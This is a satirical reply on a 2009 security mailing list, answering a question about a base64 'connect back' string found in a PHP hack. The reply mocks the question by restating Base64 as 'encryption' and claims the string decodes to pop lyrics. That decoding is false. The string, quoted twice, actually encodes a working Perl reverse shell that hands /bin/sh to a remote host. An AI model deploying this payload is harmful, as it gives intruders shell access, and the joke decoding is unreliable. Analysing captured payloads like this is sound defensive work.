Full Disclosure mailing list archives
Re: connect back PHP hack
From: Fredrick Diggle <fdiggle () gmail com>
Date: Thu, 12 Feb 2009 00:52:40 -0600
Fredrick Diggle Security has taken it upon itself to reverse this highly mystical encryption schema and has employed its crack cryptanalysis experts and reverse engineers including the highly acclaimed Mustache to get answers to your questions. The team has spent a restless 48 hours reverse engineering this schema and presents the following formal analysis to the cryptographic community at large. 1. High Level Overview A 65-character subset of US-ASCII is used, enabling 6 bits to be represented per printable character. (The extra 65th character, "=", is used to signify a special processing function.) The encoding process represents 24-bit groups of input bits as output strings of 4 encoded characters. Proceeding from left to right, a 24-bit input group is formed by concatenating 3 8-bit input groups. These 24 bits are then treated as 4 concatenated 6-bit groups, each of which is translated into a single digit in the encrypted alphabet. Each 6-bit group is used as an index into an array of 64 printable characters. The character referenced by the index is placed in the output string. Table 1: Alphabetic Substitution Value Encoding Value Encoding Value Encoding Value Encoding 0 A 17 R 34 i 51 z 1 B 18 S 35 j 52 0 2 C 19 T 36 k 53 1 3 D 20 U 37 l 54 2 4 E 21 V 38 m 55 3 5 F 22 W 39 n 56 4 6 G 23 X 40 o 57 5 7 H 24 Y 41 p 58 6 8 I 25 Z 42 q 59 7 9 J 26 a 43 r 60 8 10 K 27 b 44 s 61 9 11 L 28 c 45 t 62 + 12 M 29 d 46 u 63 / 13 N 30 e 47 v 14 O 31 f 48 w (pad) = 15 P 32 g 49 x 16 Q 33 h 50 y Special processing is performed if fewer than 24 bits are available at the end of the data being encoded. A full encoding quantum is always completed at the end of a quantity. When fewer than 24 input bits are available in an input group, zero bits are added (on the right) to form an integral number of 6-bit groups. Padding at the end of the data is performed using the '=' character. Since all encrypted input is an integral number of octets, only the following cases can arise: (1) the final quantum of encoding input is an integral multiple of 24 bits; here, the final unit of encoded output will be an integral multiple of 4 characters with no "=" padding, (2) the final quantum of encoding input is exactly 8 bits; here, the final unit of encoded output will be two characters followed by two "=" padding characters, or (3) the final quantum of encoding input is exactly 16 bits; here, the final unit of encoded output will be three characters followed by one "=" padding character. 2. Illustrations and examples To translate between binary and this encryption schema, the input is stored in a structure and the output is extracted. This relationship is displayed in the following figure. +--first octet--+-second octet--+--third octet--+ |7 6 5 4 3 2 1 0|7 6 5 4 3 2 1 0|7 6 5 4 3 2 1 0| +-----------+---+-------+-------+---+-----------+ |5 4 3 2 1 0|5 4 3 2 1 0|5 4 3 2 1 0|5 4 3 2 1 0| +--1.index--+--2.index--+--3.index--+--4.index--+ The following is an example of this schema in use. Input data: 0x14fb9c03d97e Hex: 1 4 f b 9 c | 0 3 d 9 7 e 8-bit: 00010100 11111011 10011100 | 00000011 11011001 11111110 6-bit: 000101 001111 101110 011100 | 000000 111101 100111 111110 Decimal: 5 15 46 28 0 61 37 62 Output: F P u c A 9 l + Input data: 0x14fb9c03d9 Hex: 1 4 f b 9 c | 0 3 d 9 8-bit: 00010100 11111011 10011100 | 00000011 11011001 pad with 00 6-bit: 000101 001111 101110 011100 | 000000 111101 100100 Decimal: 5 15 46 28 0 61 36 pad with = Output: F P u c A 9 k = Input data: 0x14fb9c03 Hex: 1 4 f b 9 c | 0 3 8-bit: 00010100 11111011 10011100 | 00000011 pad with 0000 6-bit: 000101 001111 101110 011100 | 000000 110000 Decimal: 5 15 46 28 0 48 pad with = = Output: F P u c A w = = 3. Conclusions Given this analysis of the provided data it is clear that when decrypted the clear text of the encrypted string : "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==" Becomes: "I've had a little bit too much, much All of the people start to rush, start to rush by A dizzy twisted dance, can't find my drink, oh man Where are my keys? I lost my phone, phone What's going on on the floor? I love this record baby but I can't see straight anymore Keep it cool, what's the name of this club? I can't remember but it's alright, a-alright Just dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, d-d-d-dance Dance, dance, just, j-j-just dance Wish I could shut my playboy mouth, oh oh oh-oh How'd I turn my shirt inside out? Inside outright Control your poison babe, roses have thorns they say And we're all getting hosed tonight, oh oh oh-oh What's going on on the floor? I love this record baby but I can't see straight anymore Keep it cool, what's the name of this club? I can't remember but it's alright, a-alright Just dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, d-d-d-dance Dance, dance, just, j-j-just When I come through on the dance floor checkin' out that catalog Can't believe my eyes, so many women without a flaw And I ain't gon' give it up, steady tryin' to pick it up like a car I'ma hit it, I'ma hit it and flex and do it until tomorr' yeah Shawty I can see that you got so much energy The way you're twirlin' up them hips 'round and 'round And now there's no reason at all why you can't leave here with me In the meantime stay and let me watch you break it down And dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, d-d-d-dance Dance, dance, just, j-j-just dance Woo! Let's go! Half psychotic, sick, hypnotic Got my blueprint, it's symphonic Half psychotic, sick, hypnotic Got my blueprint electronic Half psychotic, sick, hypnotic Got my blueprint, it's symphonic Half psychotic, sick, hypnotic Got my blueprint electronic Go! Use your muscle, carve it out, work it, hustle I got it, just stay close enough to get it Don't slow! Drive it, clean it, Lysol, bleed it Spend the last dough (I got it) In your pocko (I got it) Just dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, d-d-d-dance Dance, dance, just, j-j-just dance" (c)opyright Fredrick Diggle Security 2009 On Tue, Feb 10, 2009 at 12:23 PM, sr. <staticrez () gmail com> wrote:
can anyone tell me what encoding this is? $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; this has to do with old php 4.x.x version with magic quotes enabled. i'm just trying to figure out what the connect back code does. any input is much appreciated. thx, sr. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: connect back PHP hack, (continued)
- Re: connect back PHP hack Anastasios Monachos (Feb 10)
- Re: connect back PHP hack Gustavo Castro (Feb 10)
- Re: connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack Justin Rogosky (Feb 11)
- Re: connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack ilaiy (Feb 10)
- Re: connect back PHP hack Joe Klemencic (Feb 10)
- Re: connect back PHP hack crony (Feb 10)
- Re: connect back PHP hack Joren Gaucher (Feb 10)
- Re: connect back PHP hack Clement Dupuis (Feb 10)
- Re: connect back PHP hack Augusto Pereyra (Feb 11)
- Re: connect back PHP hack Fredrick Diggle (Feb 11)
- Re: connect back PHP hack Juha-Matti Laurio (Feb 10)
- Re: connect back PHP hack mathewm (Feb 10)
- Re: connect back PHP hack el8 (Feb 11)